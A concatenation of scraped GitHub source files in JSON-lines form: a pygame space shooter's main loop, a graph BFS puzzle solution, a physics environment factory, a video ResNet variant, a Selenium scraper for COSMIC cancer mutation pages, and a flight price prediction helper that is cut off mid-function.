unmute_btn.update_param()\r\n mute_btn.update_param()\r\n '''\r\n \r\n prevrect_img = pg.Rect(*start_pos, 50, 50)\r\n for credit in credit_img:\r\n if credit['underline']:\r\n surface, rect = textFont_entry_underline.render(credit['link'], (0,0,0))\r\n else:\r\n surface, rect = textFont_entry.render(credit['link'], (0,0,0))\r\n rect.topleft = (prevrect_img.left, prevrect_img.bottom+linespace)\r\n credit['rect'] = rect\r\n prevrect_img = rect\r\n window.blit(surface, rect)\r\n\r\n prevrect_sound = pg.Rect(start_pos[0], prevrect_img.bottom, 50, 50)\r\n for credit in credit_sound:\r\n if credit['underline']:\r\n surface, rect = textFont_entry_underline.render(credit['link'], (0,0,0))\r\n else:\r\n surface, rect = textFont_entry.render(credit['link'], (0,0,0))\r\n rect.topleft = (prevrect_sound.left, prevrect_sound.bottom+linespace)\r\n credit['rect'] = rect\r\n prevrect_sound = rect\r\n window.blit(surface, rect)\r\n\r\n for event in event_list:\r\n if event.type == pg.MOUSEWHEEL:\r\n if event.y < 0:\r\n if prevrect_sound.bottom > window_height-50:\r\n start_pos[1] += event.y*window_scroll\r\n if event.y > 0:\r\n if start_pos[1] < 0:\r\n start_pos[1] += event.y*window_scroll\r\n\r\n if event.type == pg.MOUSEMOTION:\r\n for credit in credit_img+credit_sound:\r\n if credit['rect'].collidepoint(event.pos):\r\n credit['underline'] = True\r\n pg.mouse.set_system_cursor(pg.SYSTEM_CURSOR_HAND)\r\n else:\r\n credit['underline'] = False\r\n #pg.mouse.set_system_cursor(pg.SYSTEM_CURSOR_ARROW)\r\n \r\n if event.type == pg.MOUSEBUTTONUP:\r\n for credit in credit_img+credit_sound:\r\n if credit['rect'].collidepoint(event.pos) and event.button == 1:\r\n webbrowser.open_new_tab(credit['link'])\r\n\r\n if not any([x['underline'] for x in credit_img+credit_sound]):\r\n pg.mouse.set_system_cursor(pg.SYSTEM_CURSOR_ARROW)\r\n\r\n '''\r\n mouse_pos = pg.mouse.get_pos()\r\n mouse_click = pg.mouse.get_pressed()\r\n for credit in credit_img+credit_sound:\r\n if credit['rect'].collidepoint(mouse_pos):\r\n credit['underline'] = True\r\n if mouse_click[0]:\r\n print(mouse_click) \r\n else:\r\n credit['underline'] = False\r\n '''\r\n \r\n back_btn.draw_button(back_command, event_list)\r\n \r\n pg.display.update()\r\n\r\ndef game_over(dt, screenshot):\r\n global window_width, window_height, pause_txt_background, intro\r\n\r\n textBackground = pg.image.load(r'F:\\PYTHON\\battleship_game\\resources\\images\\text-background\\home-background1920.png').convert_alpha()\r\n textBackgroundRect = textBackground.get_rect()\r\n textBackgroundRect.center = ((window_width/2), (window_height/2))\r\n\r\n textFont = pg.font.Font(r'.\\resources\\fonts\\Open_Sans\\OpenSans-Bold.ttf', 100)\r\n textSurface = textFont.render('Game Over', True, (0,0,0))\r\n textRect = textSurface.get_rect()\r\n textRect.midleft = (window_width, (textBackgroundRect.top + textBackgroundRect.height*2/3))\r\n\r\n textFont2 = pg.font.Font(r'.\\resources\\fonts\\Open_Sans\\OpenSans-SemiBold.ttf', 80)\r\n textSurface2 = textFont2.render('Score : ' + str(score_value), True, (0,0,0))\r\n textRect2 = textSurface2.get_rect()\r\n textRect2.midbottom = (window_width/2, (textBackgroundRect.top + textBackgroundRect.height*1/3))\r\n\r\n while True:\r\n\r\n event_list = pg.event.get()\r\n for event in event_list:\r\n if event.type == pg.QUIT:\r\n pg.quit()\r\n sys.exit(0)\r\n if event.type == pg.VIDEORESIZE:\r\n resize(event)\r\n '''\r\n window_width, window_height = event.size\r\n window_rect = window.get_rect()\r\n\r\n play_text_btn.update_param()\r\n highscore_text_btn.update_param()\r\n quit_text_btn.update_param()\r\n credit_text_btn.update_param()\r\n how_text_btn.update_param()\r\n\r\n unmute_btn.update_param()\r\n mute_btn.update_param()\r\n '''\r\n \r\n window.blit(pg.transform.scale(screenshot, (window_width, window_height)), (0,0))\r\n window.blit(textBackground, textBackgroundRect)\r\n window.blit(textSurface, textRect)\r\n textRect2.centerx = window_width/2\r\n window.blit(textSurface2, textRect2)\r\n\r\n change = 0.2*dt\r\n if textRect.left - change < 0:\r\n multiplier = 10 ** 0\r\n change = math.ceil(change * multiplier) / multiplier\r\n\r\n textRect.left -= change\r\n\r\n if textRect.right <= -10:\r\n intro = True\r\n reset()\r\n break\r\n\r\n pg.display.update()\r\n \r\n\r\n#Function to decrease life of player on collision with enemy or enemy lasers\r\nplayer_dmg_sound = mixer.Sound(r'.\\resources\\sounds\\whoosh-sci-fi-short.wav')\r\ndef player_collision(dt):\r\n global enemy_small, enemy_medium, player_rect, player_health, mute, score_value\r\n global enemy_large, player_dmg_sound, mute, powerups, channels\r\n\r\n for enemy in enemy_small:\r\n if (player_rect.colliderect(enemy_small[enemy]['rect']) and\r\n enemy_small[enemy]['alive']):\r\n player_health -= 1\r\n enemy_small[enemy]['alive'] = False\r\n score_value += 1\r\n if mute == False:\r\n channels[1].play(explosion_sound)\r\n\r\n if (player_rect.colliderect(enemy_small[enemy]['laser_rect']) and\r\n enemy_small[enemy]['laser_draw']):\r\n player_health -= 1\r\n enemy_small[enemy]['laser_draw'] = False\r\n if mute == False:\r\n channels[9].play(player_dmg_sound)\r\n\r\n for laser in enemy_medium.lasers:\r\n if player_rect.colliderect(enemy_medium.lasers[laser]['laser1rect']):\r\n enemy_medium.lasers[laser]['cur_laser1_x'] = enemy_medium.lasers[laser]['cur_laser1_y'] = -50\r\n player_health -= 1\r\n if mute == False:\r\n channels[9].play(player_dmg_sound)\r\n if player_rect.colliderect(enemy_medium.lasers[laser]['laser2rect']):\r\n enemy_medium.lasers[laser]['cur_laser2_x'] = enemy_medium.lasers[laser]['cur_laser2_y'] = -50\r\n player_health -= 1\r\n if mute == False:\r\n channels[9].play(player_dmg_sound)\r\n\r\n for laser in enemy_large.lasers:\r\n if player_rect.colliderect(enemy_large.lasers[laser]['laser1rect']):\r\n enemy_large.lasers[laser]['laser1rect'].x = enemy_large.lasers[laser]['laser1rect'].y = -50\r\n player_health -= 1\r\n if mute == False:\r\n channels[9].play(player_dmg_sound)\r\n\r\n for plasma in enemy_large.plasmas:\r\n if player_rect.colliderect(enemy_large.plasmas[plasma]['rect']):\r\n enemy_large.plasmas[plasma]['cur_x'] = enemy_large.plasmas[plasma]['cur_y'] = -50\r\n player_health -= 1\r\n if mute == False:\r\n channels[9].play(player_dmg_sound)\r\n\r\n for item in powerups.powerups:\r\n if player_rect.colliderect(powerups.powerups[item]['rect']):\r\n powerups.powerups[item]['func'](dt)\r\n\r\n \r\ndef update_highscore():\r\n global hs_dict, score_value\r\n\r\n if len(hs_dict) < 5:\r\n hs_dict[len(hs_dict)+1] = [score_value, datetime.datetime.now().strftime('%d-%b-%Y, %I:%M:%S %p')]\r\n elif len(hs_dict) == 5:\r\n if score_value >= hs_dict[list(hs_dict.keys())[-1]][0]:\r\n hs_dict[list(hs_dict.keys())[-1]] = [score_value, datetime.datetime.now().strftime('%d-%b-%Y, %I:%M:%S %p')]\r\n\r\n hs_dict = {k: v for k, v in sorted(hs_dict.items(), key=lambda item: item[1][0], reverse=True)}\r\n\r\n with open('highscores.pickle', 'wb') as fh:\r\n pickle.dump(hs_dict, fh)\r\n\r\n#Resize and rearrange various surfaces\r\ndef resize(event):\r\n global window_width, window_height, window_rect, pause_btn, play_btn, charge_rect\r\n global rocket_rect, unmute_btn, mute_btn ,home_btn, play_text_btn, highscore_text_btn\r\n global quit_text_btn, credit_text_btn, how_text_btn, enemy_medium, enemy_large\r\n\r\n\r\n player_update(event)\r\n\r\n window_width, window_height = event.size\r\n window_rect = window.get_rect()\r\n\r\n update_player_health_rect()\r\n\r\n pause_btn.update_param()\r\n play_btn.update_param()\r\n unmute_btn.update_param()\r\n mute_btn.update_param()\r\n home_btn.update_param()\r\n\r\n play_text_btn.update_param()\r\n highscore_text_btn.update_param()\r\n quit_text_btn.update_param()\r\n credit_text_btn.update_param()\r\n how_text_btn.update_param()\r\n\r\n charge_rect.bottomleft = (10, window_height-10)\r\n rocket_rect.center = charge_rect.center\r\n\r\n enemy_medium.resize()\r\n enemy_large.resize()\r\n \r\n \r\n#Reset game and make it ready for new game\r\ndef reset():\r\n global score_value, cur_player_x, cur_player_y, player_img_w, player_img_h\r\n global lasers, reset_game, enemy_medium, isinit_enemy_small_last\r\n global spawn_medium_enemy_trigger1, spawn_medium_enemy_trigger2\r\n global player_health, playerX_change, playerY_change, lvl_value, player_max_health\r\n global enemy_large, charge_value, missile_explosion_dict, powerups, enemy_small_killed\r\n \r\n if score_value > 0:\r\n update_highscore()\r\n score_value = 0\r\n\r\n lvl_value = 1\r\n\r\n charge_value = 0\r\n\r\n player_health = player_max_health\r\n\r\n cur_player_x = window_width/2 - player_img_w/2\r\n cur_player_y = ((window_height/player_img_h)-1.5)*player_img_h\r\n playerX_change = 0\r\n playerY_change = 0\r\n\r\n init_enemy_small_pos()\r\n isinit_enemy_small_last = False\r\n enemy_small_killed = 0\r\n \r\n lasers.clear()\r\n\r\n enemy_medium.__init__()\r\n spawn_medium_enemy_trigger1 = False\r\n spawn_medium_enemy_trigger2 = False\r\n\r\n enemy_large.__init__()\r\n spawn_large_enemy_trigger1 = False\r\n spawn_large_enemy_trigger2 = False\r\n\r\n for explosion in missile_explosion_dict:\r\n missile_explosion_dict[explosion][1].center = (-1000, -1000)\r\n\r\n powerups.__init__()\r\n\r\n reset_game = False\r\n\r\n#Mainloop clock\r\nclock = pg.time.Clock()\r\n\r\nfps_font = pg.font.Font(r'.\\resources\\fonts\\Open_Sans\\OpenSans-Regular.ttf', 20) \r\nreset_game = False\r\nrunning = True\r\n\r\n\r\n#MAIN GAME LOOP\r\n#All gameplay objects are drawn in this loop.\r\n#All evnets(like mouse click and key press) during gameplay are handled in this loop. \r\nwhile running:\r\n \r\n dt = clock.tick(60)\r\n if dt > 30:\r\n dt = 30\r\n \r\n fps_surface = fps_font.render(f'{clock.get_fps():.2f}', True, (0,0,0))\r\n window.fill((255,255,255))\r\n\r\n if intro:\r\n game_intro()\r\n if reset_game:\r\n reset()\r\n\r\n background.draw_background(dt)\r\n\r\n #EVENT HANDLING\r\n event_list = pg.event.get()\r\n for event in event_list:\r\n\r\n if event.type == pg.QUIT:\r\n if score_value:\r\n update_highscore()\r\n running = False\r\n #pg.quit()\r\n #sys.exit()\r\n\r\n if event.type == pg.KEYDOWN:\r\n if event.key == pg.K_LEFT:\r\n playerX_change = -player_xspeed*dt\r\n if event.key == pg.K_RIGHT:\r\n playerX_change = player_xspeed*dt\r\n if event.key == pg.K_UP:\r\n playerY_change = -player_yspeed*dt\r\n if event.key == pg.K_DOWN:\r\n playerY_change = player_yspeed*dt\r\n\r\n if event.key == pg.K_a:\r\n add_laser()\r\n if event.key == pg.K_s:\r\n if charge_value == 12:\r\n if mute == False:\r\n channels[4].play(missile_launch_sound)\r\n missile_draw = True\r\n missile_rect.midbottom = player_rect.midtop\r\n missile_cur_x = missile_rect.x\r\n missile_cur_y = missile_rect.y\r\n charge_value = 0\r\n \r\n if event.type == pg.KEYUP:\r\n if event.key == pg.K_LEFT or event.key == pg.K_RIGHT:\r\n pressed = pg.key.get_pressed()\r\n if pressed[pg.K_RIGHT] or pressed[pg.K_LEFT]:\r\n playerX_change = playerX_change\r\n else:\r\n playerX_change = 0\r\n if event.key == pg.K_UP or event.key == pg.K_DOWN:\r\n pressed = pg.key.get_pressed()\r\n if pressed[pg.K_UP] or pressed[pg.K_DOWN]:\r\n playerY_change = playerY_change\r\n else:\r\n playerY_change = 0\r\n\r\n if event.type == pg.VIDEORESIZE:\r\n resize(event)\r\n '''\r\n player_update(event)\r\n\r\n window_width, window_height = event.size\r\n window_rect = window.get_rect()\r\n\r\n update_player_health_rect()\r\n\r\n pause_btn.update_param()\r\n play_btn.update_param()\r\n unmute_btn.update_param()\r\n mute_btn.update_param()\r\n home_btn.update_param()\r\n\r\n charge_rect.bottomleft = (10, window_height-10)\r\n rocket_rect.center = charge_rect.center\r\n '''\r\n\r\n powerups.draw(dt)\r\n\r\n draw_charge_quantity()\r\n \r\n #Drawing flashes from payer cannon\r\n pressed = pg.key.get_pressed()\r\n if pressed[pg.K_a]:\r\n num = draw_flash(player_rect, num)\r\n \r\n background_objects.draw_objects(dt)\r\n \r\n draw_player()\r\n\r\n #if str(lvl_value)[-1] == '9' and score_value%20 == 0:\r\n # increase_lvl()\r\n \r\n #Condition to spawn large enemy\r\n #if lvl_value and lvl_value%5 == 0:\r\n if (lvl_value and\r\n enemy_small_killed >= 20 and\r\n (str(lvl_value)[-1] == '4' or\r\n str(lvl_value)[-1] == '9')):\r\n if not isinit_enemy_small_last:\r\n isinit_enemy_small_last = True\r\n spawn_large_enemy_trigger1 = True\r\n init_enemy_small_last()\r\n\r\n if spawn_large_enemy_trigger1 and not spawn_large_enemy_trigger2:\r\n draw_enemy_small_last(dt)\r\n\r\n if spawn_large_enemy_trigger1 and spawn_large_enemy_trigger2:\r\n enemy_large.draw_enemy(dt, event_list)\r\n \r\n #Condition to spawn medium enemy\r\n if (enemy_small_killed >= 20 and\r\n str(lvl_value)[-1] != '9' and str(lvl_value)[-1] != '4'):\r\n if not isinit_enemy_small_last:\r\n isinit_enemy_small_last = True\r\n spawn_medium_enemy_trigger1 = True\r\n init_enemy_small_last() \r\n \r\n if spawn_medium_enemy_trigger1 and not spawn_medium_enemy_trigger2:\r\n draw_enemy_small_last(dt)\r\n\r\n if spawn_medium_enemy_trigger1 and spawn_medium_enemy_trigger2:\r\n enemy_medium.draw_enemy(dt, event_list)\r\n\r\n \r\n if not spawn_medium_enemy_trigger1 and not spawn_large_enemy_trigger1:\r\n draw_enemy_small(dt)\r\n\r\n draw_laser(dt)\r\n\r\n #if missile_draw:\r\n draw_missile(dt)\r\n\r\n draw_score(scoreX, scoreY)\r\n draw_lvl()\r\n\r\n screenshot = pg.Surface((window_width, window_height))\r\n screenshot.blit(window, (0,0))\r\n \r\n home_btn.update_param()\r\n home_btn.draw_button(home_command, event_list, screenshot)\r\n \r\n pause_btn.update_param()\r\n pause_btn.draw_button(pause_command, event_list, screenshot)\r\n\r\n mute_btn.btn_inactiveX = window_width - mute_btn_inactive_img.get_width() - 15\r\n mute_btn.btn_inactiveY = 20 + mute_btn_inactive_img.get_height() + 20\r\n mute_btn.update_param()\r\n unmute_btn.btn_inactiveX = window_width - unmute_btn_inactive_img.get_width() - 15\r\n unmute_btn.btn_inactiveY = 20 + unmute_btn_inactive_img.get_height() + 20\r\n unmute_btn.update_param()\r\n if mute:\r\n unmute_btn.draw_button(unmute_command, event_list)\r\n else:\r\n mute_btn.draw_button(mute_command, event_list)\r\n\r\n if player_health < 1:\r\n game_over(dt, screenshot)\r\n\r\n player_collision(dt)\r\n\r\n window.blit(fps_surface, (5, window_height-150))\r\n \r\n pg.display.update()\r\n #END OF GAME LOOP\r\n\r\n\r\npg.quit()\r\n","repo_name":"LuvGautam/Battleship-Game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":134472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38958145939","text":"from collections import deque\n\ndef make_graph(wires, n):\n graph = [[] for i in range(n + 1)]\n\n for wire in wires:\n graph[wire[0]].append(wire[1])\n graph[wire[1]].append(wire[0])\n\n return graph\n\ndef bfs(graph, start, visited):\n queue = deque([start])\n visited[start] = True\n \n list = []\n while queue:\n v = queue.popleft()\n list.append(v)\n\n for i in graph[v]:\n if not visited[i]:\n queue.append(i)\n visited[i] = True\n\n return list\n\ndef solution(n, wires):\n answer = 100\n wires = sorted(wires, key = lambda x : (x[0], x[1]))\n\n for i in range(len(wires)):\n wire = wires[:i] + wires[i+1:]\n graph = make_graph(wire, n)\n \n node = set([])\n for j in range(1, n + 1):\n visited = [False] * (n + 1)\n bfs(graph, j, visited)\n node.add(visited.count(True))\n\n if max(node) - min(node) < answer:\n answer = max(node) - min(node)\n\n return answer\n","repo_name":"YeonsuBaek/algorithm-test","sub_path":"프로그래머스/lv2/86971. 전력망을 둘로 나누기/전력망을 둘로 나누기.py","file_name":"전력망을 둘로 나누기.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"23973296497","text":"\"\"\"Environment factory class. Given a valid environment name and its constructor args, returns an instantiation of it\n\"\"\"\nimport os\nimport sys\n\nsys.path.append(os.path.dirname(os.path.abspath(__file__)))\n\nfrom environment import Environment\nfrom pendulum import Pendulum\nfrom spring import Spring\nfrom gravity import NObjectGravity\nfrom chaotic_pendulum import ChaoticPendulum\n\n\nclass EnvFactory():\n \"\"\"Return a new Environment\"\"\"\n\n # Map the name of the name of the Environment concrete class by retrieving all its subclasses\n _name_to_env = {cl.__name__: cl for cl in Environment.__subclasses__()}\n\n @staticmethod\n def get_environment(name, **kwargs):\n \"\"\"Return an environment object based on the environment identifier.\n\n Args:\n name (string); name of the class of the concrete Environment.\n **kwargs: args supplied to the constructor of the object of class name. \n \n Raises:\n (NameError): if the given environment type is not supported.\n \n Returns:\n (Environment): concrete instantiation of the Environment.\n \"\"\"\n try:\n return EnvFactory._name_to_env[name](**kwargs)\n except KeyError:\n msg = \"%s is not a supported type by Environment.\" % (name)\n msg += \"Available types are: \" + \"\".join(\"%s \" % eef for eef in EnvFactory._name_to_env.keys())\n raise NameError(msg)\n\n\nif __name__ == \"__main__\":\n # EnvFactory test\n env = EnvFactory.get_environment(\"Pendulum\", mass=0.5, length=1, g=10)\n print(type(env))\n\n from matplotlib import pyplot as plt, animation\n import numpy as np\n rolls = env.sample_random_rollouts(number_of_frames=100,\n delta_time=0.1,\n number_of_rollouts=16,\n img_size=32,\n color=False,\n noise_level=0.,\n seed=23)\n fig = plt.figure()\n img = []\n idx = np.random.randint(rolls.shape[0])\n for im in rolls[idx]:\n img.append([plt.imshow(im, animated=True)])\n ani = animation.ArtistAnimation(fig,\n img,\n interval=50,\n blit=True,\n repeat_delay=1000)\n plt.show()","repo_name":"CampusAI/Hamiltonian-Generative-Networks","sub_path":"environments/environment_factory.py","file_name":"environment_factory.py","file_ext":"py","file_size_in_byte":2449,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"19"} +{"seq_id":"39528280603","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Oct 6 13:46:30 2018\n\n@author: renatobottermaiolopesrodrigues\n\"\"\"\n\n\ndef solution(A, K):\n\n if len(A) == K:\n return A\n \n count = 0\n while (count < K):\n aux = None\n for i in range(len(A)-1):\n if not aux:\n aux, A[i+1] = A[i+1], A[i]\n else:\n aux, A[i+1] = A[i+1], aux\n A[0] = aux\n count += 1\n return A\n\nsolution([], 3)","repo_name":"RenatoBMLR/Programming_Challenges","sub_path":"Codility/array_rotation.py","file_name":"array_rotation.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"4180214631","text":"import math\nimport torch.nn as nn\nfrom torchvision.models.video.resnet import VideoResNet,BasicBlock,Conv2Plus1D,R2Plus1dStem,Bottleneck\n\n\nclass VideoResNetPlus(VideoResNet):\n def __init__(self, block, conv_makers, layers,\n stem, num_classes=400, width = 64,\n zero_init_residual=False):\n \"\"\"Generic resnet video generator.\n\n Args:\n block (nn.Module): resnet building block\n conv_makers (list(functions)): generator function for each layer\n layers (List[int]): number of blocks per layer\n stem (nn.Module, optional): Resnet stem, if None, defaults to conv-bn-relu. Defaults to None.\n num_classes (int, optional): Dimension of the final FC layer. Defaults to 400.\n zero_init_residual (bool, optional): Zero init bottleneck residual BN. Defaults to False.\n \"\"\"\n super(VideoResNet, self).__init__()\n self.inplanes = 64\n\n self.stem = stem()\n\n self.layer1 = self._make_layer(block, conv_makers[0], width, layers[0], stride=1)\n self.layer2 = self._make_layer(block, conv_makers[1], int(width*2), layers[1], stride=2)\n self.layer3 = self._make_layer(block, conv_makers[2], int(width*4), layers[2], stride=2)\n self.layer4 = self._make_layer(block, conv_makers[3], int(width*8), layers[3], stride=2)\n\n self.avgpool = nn.AdaptiveAvgPool3d((1, 1, 1))\n self.fc = nn.Linear(int(width*8), num_classes)\n\n # init weights\n # self._initialize_weights()\n\n if zero_init_residual:\n for m in self.modules():\n if isinstance(m, Bottleneck):\n nn.init.constant_(m.bn3.weight, 0)\n\n\ndef r2plus1d_scaling(num_classes,multiplier=8):\n \"\"\"Constructor for the 18 layer deep R(2+1)D network as in\n https://arxiv.org/abs/1711.11248\n\n Args:\n pretrained (bool): If True, returns a model pre-trained on Kinetics-400\n progress (bool): If True, displays a progress bar of the download to stderr\n\n Returns:\n nn.Module: R(2+1)D-18 network\n \"\"\"\n block = BasicBlock\n conv_makers = [Conv2Plus1D] * 4\n layers = [int(math.floor(multiplier/8))+1] * 4\n stem = R2Plus1dStem\n width = 8*multiplier\n model = VideoResNetPlus(block = block,conv_makers=conv_makers,layers=layers,stem=stem,width = width,num_classes=num_classes)\n return model","repo_name":"CoCoPIE-Group/video-classification-s2-1d","sub_path":"network/scaling_s21d.py","file_name":"scaling_s21d.py","file_ext":"py","file_size_in_byte":2392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"6944840604","text":"from selenium import webdriver\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\n\nfrom time import sleep\nfrom bs4 import BeautifulSoup\nimport requests\n\nchrome = webdriver.Remote(\n command_executor='http://localhost:4444/wd/hub',\n desired_capabilities=DesiredCapabilities.CHROME)\n\n\nclass OverViewParser:\n id = None\n url = \"https://cancer.sanger.ac.uk/cosmic/mutation/overview?id=\"\n soup = \"\"\n overview_dict = dict()\n data_available = False\n\n\n def __init__(self, id=\"6261085\"):\n self.id = id\n self.url = self.url+self.id\n end_point = self.url\n chrome.get(end_point)\n sleep(2)\n main_soup = BeautifulSoup(chrome.page_source, 'lxml')\n self.soup = main_soup\n self.check_if_snp()\n self.get_main_dict()\n\n def check_if_snp(self):\n if self.soup:\n try:\n if \"has been flagged as a SNP\" in self.soup.find('p', class_='quote').text:\n self.data_available = False\n except:\n self.data_available = True\n\n def get_main_dict(self):\n if self.data_available:\n field_name = self.chops_main_table_returns_field_name()\n field_value = self.chops_main_table_returns_value()\n\n # This is our main dict\n dict_main_fields = dict(zip(field_name, field_value))\n\n self.overview_dict = self.put_everything_in_main_dict(value=dict_main_fields)\n\n def chops_main_table_returns_field_name(self):\n if self.data_available:\n # chops the main table that occurs on the top of the page. Very Necessary\n first_entry_table = self.soup.find('dl', class_='inline')\n try:\n # chops up the individual fields like Mutation ID, Gene name, AA mutation etc etc.\n field_name = [link.string for link in first_entry_table.find_all('dt')]\n except Exception as ex:\n raise Exception(\"Internet Connection is Down: Therefore: {}\".format(ex))\n\n return field_name\n\n def chops_main_table_returns_value(self):\n if self.data_available:\n # chops up the individual values like COSM6261085, etc etc\n field_value = []\n first_entry_table = self.soup.find('dl', class_='inline')\n f_value = first_entry_table.find_all('dd')\n\n for fv in f_value:\n tmp_dict = dict()\n if fv.find_all('a'):\n for fv_hrefs in fv.find_all('a'):\n try:\n tester_tag = fv_hrefs.contents[0].strip(' ').replace('\\n', \" \").replace(\" \", \"\")\n tester_link = fv_hrefs['href']\n tmp_dict[tester_tag] = tester_link\n except:\n pass\n field_value.append(tmp_dict)\n else:\n try:\n data = fv.find_all('p')[0].text.replace('\\n', ' ').strip(' ')\n field_value.append(data)\n except:\n data = fv.text.replace('\\n', ' ').strip(' ')\n field_value.append(data)\n\n return field_value\n\n def put_everything_in_main_dict(self, value=None):\n if self.data_available and value:\n main_dict = dict()\n main_dict[self.soup.find('h2').text.replace('COSM', '')] = value\n\n return main_dict\n\n\nclass TissueDistributionParser(OverViewParser):\n tissue_distribution_dict = dict()\n\n def __init__(self, id=\"6261085\"):\n super().__init__(id=id)\n self.set_tissue_distribution_dict()\n\n def set_tissue_distribution_dict(self):\n if self.data_available:\n all_tissues_even_odd = self.soup.find_all('div', class_='section-content')[2].find_all('tr', {\"class\": [\"even\", \"odd\"]})\n tmp_dict = dict()\n for all in all_tissues_even_odd:\n all_tissues = all.find_all('a')\n for tissues in all_tissues:\n link = tissues['href']\n if 'tissue' in link:\n link_name = tissues.contents[0].strip(' ').replace('\\n', \" \").replace(\" \", \"\")\n tmp_dict[link_name] = link\n\n self.tissue_distribution_dict = tmp_dict\n\n\nclass SampleParser(TissueDistributionParser):\n sample_dict = dict()\n\n def __init__(self, id=\"6261085\"):\n super().__init__(id=id)\n self.set_sample_parser_dict()\n\n def set_sample_parser_dict(self):\n if self.data_available:\n field_values = self.chops_sample_table_returns_field_value()\n field_name = self.chop_sample_table_returns_field_name()\n\n dict_sample_fields = {k: field_values[i::len(field_name)] for i, k in enumerate(field_name)}\n\n self.sample_dict = dict_sample_fields\n\n def chops_sample_table_returns_field_value(self):\n if self.data_available:\n # chops up the individual values like CHG-13-09220T, etc etc\n field_value = []\n\n for f_even_odd in self.soup.find_all('div', class_='section-content')[2].find_all('tr', {\"class\": [\"even\", \"odd\"]}):\n f_value = f_even_odd.find_all('td')\n for fv in f_value:\n tmp_dict = dict()\n if fv.find_all('a'):\n for fv_hrefs in fv.find_all('a'):\n try:\n tester_tag = fv_hrefs.contents[0].strip(' ').replace('\\n', \" \").replace(\" \", \"\")\n tester_link = fv_hrefs['href']\n tmp_dict[tester_tag] = tester_link\n except:\n tester_tag = fv_hrefs.contents[0].contents[0].strip(' ').replace('\\n', \" \").replace(\" \", \"\")\n tester_link = fv_hrefs['href']\n tmp_dict[tester_tag] = tester_link\n field_value.append(tmp_dict)\n else:\n try:\n data = fv.find_all('p')[0].text.replace('\\n', ' ').strip(' ')\n field_value.append(data)\n except:\n data = fv.text.replace('\\n', ' ').strip(' ')\n field_value.append(data)\n\n\n return field_value\n\n def chop_sample_table_returns_field_name(self):\n if self.data_available:\n # chops up the individual values like SAMPLE NAME, GENE NAME, etc etc\n field_name = []\n f_name = self.soup.find_all('div', class_='section-content')[2].find('tr').find_all('th')\n\n for fn in f_name:\n name = fn.contents[0].strip(' ').replace('\\n', \" \").replace(\" \", \"\")\n field_name.append(name)\n\n return field_name\n\n\nclass ReferenceParser(SampleParser):\n reference_dict = dict()\n\n def __init__(self, id=\"6261085\"):\n super().__init__(id=id)\n self.set_reference_parser_dict()\n\n def set_reference_parser_dict(self):\n if self.data_available:\n field_values = self.chops_reference_table_returns_field_value()\n field_name = self.chop_reference_table_returns_field_name()\n\n dict_reference_fields = {k: field_values[i::len(field_name)] for i, k in enumerate(field_name)}\n\n self.reference_dict = dict_reference_fields\n\n def chops_reference_table_returns_field_value(self):\n if self.data_available:\n # chops up the individual values like CHG-13-09220T, etc etc\n field_value = []\n\n for f_even_odd in self.soup.find_all('div', class_='section-content')[2].find_all('tr', {\"class\": [\"even\", \"odd\"]}):\n f_value = f_even_odd.find_all('td')\n for fv in f_value:\n tmp_dict = dict()\n if fv.find_all('a'):\n for fv_hrefs in fv.find_all('a'):\n try:\n tester_tag = fv_hrefs.contents[0].strip(' ').replace('\\n', \" \").replace(\" \", \"\")\n tester_link = fv_hrefs['href']\n tmp_dict[tester_tag] = tester_link\n except:\n tester_tag = fv_hrefs.contents[0].contents[0].strip(' ').replace('\\n', \" \").replace(\" \", \"\")\n tester_link = fv_hrefs['href']\n tmp_dict[tester_tag] = tester_link\n field_value.append(tmp_dict)\n else:\n try:\n data = fv.find_all('p')[0].text.replace('\\n', ' ').strip(' ')\n field_value.append(data)\n except:\n data = fv.text.replace('\\n', ' ').strip(' ')\n field_value.append(data)\n\n return field_value\n\n def chop_reference_table_returns_field_name(self):\n if self.data_available:\n # chops up the individual values like SAMPLE NAME, GENE NAME, etc etc\n field_name = []\n f_name = self.soup.find_all('div', class_='section-content')[3].find('tr').find_all('th')\n\n for fn in f_name:\n name = fn.contents[0].strip(' ').replace('\\n', \" \").replace(\" \", \"\")\n field_name.append(name)\n\n return field_name\n\n\nclass Parser(ReferenceParser):\n main_dict = dict()\n\n def __init__(self, id=\"6261085\"):\n super().__init__(id=id)\n self.main_dict['OverView'] = self.overview_dict\n self.main_dict['Tissue'] = self.tissue_distribution_dict\n self.main_dict['Sample'] = self.sample_dict\n self.main_dict['Reference'] = self.reference_dict\n\n\n# p = Chopper(id=str(4745787))\n# if p:\n# pass\n","repo_name":"kanzabatool/Grad_project","sub_path":"Automatically_annotating_cancervariants_using_publicdatabases/gene_parser.py","file_name":"gene_parser.py","file_ext":"py","file_size_in_byte":9991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"41373986608","text":"import pickle\nimport json\nimport numpy as np\nimport pandas as pd\n\n__data_columns = None\n__model = None\n__airlines=None\n__sources=None\n__stop_details=None\n__destinations=None\ndata=None\n\ndef get_source_names():\n return __sources\n\ndef get_destination_names():\n return __destinations\n\ndef get_stop_details():\n return __stop_details\n\ndef get_airline_names():\n return __airlines\n\ndef get_data():\n print(data)\n return data\n\ndef get_estimated_price(Airline,Source,Destination,Departure,Arrival,Stops):\n try:\n airline_index= __data_columns.index(\"airline_\" + Airline.lower())\n except:\n airline_index=-1\n try: \n source_index= __data_columns.index(\"source_\" + Source.lower())\n except:\n source_index=-1\n try:\n destination_index=__data_columns.index(\"destination_\" + Destination.lower())\n except:\n destination_index=-1\n\n \n\n x=np.zeros(len(__data_columns))\n\n x[0]= __stop_details.get(Stops.lower())\n x[1]= int(pd.to_datetime(Departure, format=\"%Y-%m-%dT%H:%M\").day)\n x[2]= int(pd.to_datetime(Departure, format =\"%Y-%m-%dT%H:%M\").month)\n x[3]= 